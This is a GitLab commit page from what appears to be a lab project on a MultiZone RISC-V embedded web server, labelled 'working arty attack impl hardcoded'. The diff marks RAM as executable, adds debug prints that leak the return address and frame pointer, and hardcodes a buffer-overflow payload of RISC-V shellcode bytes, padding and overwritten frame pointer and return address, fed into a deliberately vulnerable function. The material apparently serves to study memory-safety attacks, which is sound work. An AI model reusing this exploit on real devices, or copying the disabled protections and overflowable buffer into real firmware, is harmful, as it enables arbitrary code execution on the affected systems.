Skip to content
Snippets Groups Projects
Commit 10b2aaee authored by fptk's avatar fptk
Browse files

working arty attack impl hardcoded

parent 7384d380
Branches
Tags
No related merge requests found
......@@ -7,7 +7,7 @@ Tick = 10 # ms
Zone = 1
plic = 21 # ETHERNET
base = 0x20440000; size = 128K; rwx = rwx # FLASH
base = 0x80001800; size = 38K; rwx = rw # RAM
base = 0x80001800; size = 38K; rwx = rwx # RAM
base = 0x8000B000; size = 2K; rwx = w # SH BUFF1
base = 0x8000B800; size = 8K; rwx = w # SH BUFF2
base = 0x60000000; size = 0x2000; rwx = rw # XEMACLITE
......
.text
li a0, 0x2044b37c
li t3, 0x204408f8
jalr t4, t3
......@@ -5,9 +5,9 @@
#include "multizone.h"
#define printf2(format, args...) { /* Multi-part printf() */\
char *str = malloc(64); \
char *str = malloc(128); \
if (str != NULL){ \
const int len = snprintf(str, 64, format, ## args); \
const int len = snprintf(str, 128, format, ## args); \
for (int i=0; i<(len/16)+1; i++){ \
while(!MZONE_SEND(2, (str+16*i))) MZONE_YIELD(); \
} \
......
......@@ -43,9 +43,10 @@ char *attack_me(char *data, uint32_t data_len) {
// nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough
char message[128];
//for debugging purpose
printf2("Framepointer: 0x%x\n", *(uint32_t *)&message[140]);
printf2("Rücksprungadresse: 0x%x\n", *(uint32_t *)&message[140] - 204);
printf2("CD: 0x%08x ", ((uint32_t*)(&message[8])));
printf2("F-: 0x%08x ", *((uint32_t*)(&message[136])));
printf2("RA: 0x%08x ", *((uint32_t*)(&message[140])));
printf2("FP: 0x%08x ", *((uint32_t*)(&message[156])));
memset(message, 'B', sizeof(message));
memcpy(message, "Hallo, ", 7);
......@@ -70,13 +71,54 @@ char *server_request_handler(char *location, enum request_type type, char *data,
if(data_len >= 5 && strncmp(data, "name=", 5) == 0) {
uint32_t name_len = data_len - 5;
name_len = webserver_percent_decode(&data[5], name_len);
data = "X" // padding to align the instructions
"\x37\xb5\x44\x20" // 0: lui a0,0x2044b
"\x13\x05\xc5\x37" // 4: addi a0,a0,892 # 0x2044b37c
"\x37\x1e\x44\x20" // 8: lui t3,0x20441
"\x13\x0e\x8e\x8f" // c: addi t3,t3,-1800 # 0x204408f8
"\xe7\x0e\x0e\x00" // 10: jalr t4,t3
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"XXXX" // padding to overwrite the return address
"\x2c\x69\x00\x80" // the new frame pointer: 0x80004ba2
"\x78\x68\x00\x80"; // the new return address: 0x80006870
// nobody could possibly enter a name longer than 20 characters, so this buffer
// is definitely large enough
char *return_string;
return_string = attack_me(&data[5], name_len);
//return_string = attack_me(&data[5], name_len);
return_string = attack_me(data, 137);
char* response = http_prepare_response(return_string, strlen(return_string), 200, out_len);
free(return_string);
//free(return_string);
return response;
} else {
return http_prepare_response(RESPONSE_404, strlen(RESPONSE_404), 404, out_len);
......
0% Loading or .
You are about to add 0 people to the discussion. Proceed with caution.
Please register or to comment